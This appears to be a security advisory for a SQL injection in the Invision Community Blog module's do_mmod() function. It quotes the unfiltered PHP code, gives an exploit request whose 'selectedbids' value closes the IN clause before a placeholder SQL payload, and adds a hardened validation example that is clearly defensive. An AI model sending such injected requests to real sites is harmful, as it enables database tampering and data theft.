[LEFT]

Invision Community Blog .. Bugs


SQL Injection :-


    Filename      :- mod.php

    Function name :- do_mmod()


$ids is built as an array from user input, but its elements are never filtered with intval(), so SQL injection is possible -->

* Arabic *

[/LEFT]

[RIGHT]

The variable $ids is not filtered through the intval function, and it is in array form .. for this reason an injection can be performed

[/RIGHT]

[LEFT]

[php]

// Initialised as an array, then filled directly from the request parameter
$ids = array();

$ids = explode( ',', $this->ipsclass->input['selectedbids'] );


...


// Re-joined into a string without any element being passed through intval()
$ids = implode( ',', $ids );


...


// $ids is interpolated into the WHERE clause as-is
$this->ipsclass->DB->do_update ( 'blog_blogs', array ( 'blog_disabled' => 1 ), "blog_id IN ({$ids})" );

$this->ipsclass->DB->simple_construct ( array ( 'select' => 'member_id', 'from' => 'blog_blogs', 'where' => "blog_id IN ({$ids})" ) );

$this->ipsclass->DB->simple_exec();


....


$this->ipsclass->DB->do_update ( 'blog_blogs', array ( 'blog_disabled' => 0 ), "blog_id IN ({$ids})");

$this->ipsclass->DB->simple_construct ( array ( 'select' => 'member_id', 'from' => 'blog_blogs', 'where' => "blog_id IN ({$ids})" ) );


....


[/php]

[/LEFT]

[RIGHT]

*Exploitation*

[/RIGHT]

[LEFT]

Exploit :-


    GET ^

        /IBP/index.php?

    POST ^

        automodule=blog&req=blogmmod&auth_key=[auth_key]&selectedbids=-1,-1)[SQL]&blogact=unpin

[/LEFT]
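The missing integer filtering on `$ids`, shown next to a hardened form. This is an added example, not code from IP.Blog or from the advisory's author. The function names `parse_id_list`, `where_unfiltered` and `where_filtered` are hypothetical and the sample inputs are constructed. Instead of coercing with intval(), it drops every element that is not a positive integer and skips the query when nothing valid remains.

```php
<?php
// Added example: function names are hypothetical, not IP.Blog code.

/**
 * Turn a comma-separated request value into a list of positive integer IDs.
 * Elements that are not plain integers are dropped rather than coerced.
 */
function parse_id_list(string $raw): array
{
    $ids = [];
    foreach (explode(',', $raw) as $part) {
        $id = filter_var(trim($part), FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($id !== false) {
            $ids[$id] = $id;   // keyed by value to de-duplicate
        }
    }
    return array_values($ids);
}

/** Pattern from the advisory: the raw string is split and re-joined unchanged. */
function where_unfiltered(string $raw): string
{
    $ids = implode(',', explode(',', $raw));
    return "blog_id IN ({$ids})";
}

/** Hardened form: only validated integers reach the clause; null means "run no query". */
function where_filtered(string $raw): ?string
{
    $ids = parse_id_list($raw);
    if ($ids === []) {
        return null;           // an empty IN () is invalid SQL in MySQL, so skip the query
    }
    return 'blog_id IN (' . implode(',', $ids) . ')';
}

// Constructed sample inputs; "[SQL]" is the advisory's own placeholder, kept literal.
$samples = ['3,7,12', ' 4 , 4 ,9', '-1,-1)[SQL]', '5,abc,0x1A,8'];
foreach ($samples as $raw) {
    printf("input      : %s\n", $raw);
    printf("unfiltered : %s\n", where_unfiltered($raw));
    printf("filtered   : %s\n\n", where_filtered($raw) ?? '(no valid ids, query skipped)');
}
```

For the third sample the unfiltered clause closes the parenthesis early and carries the placeholder into the statement, while the filtered form yields no clause at all.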



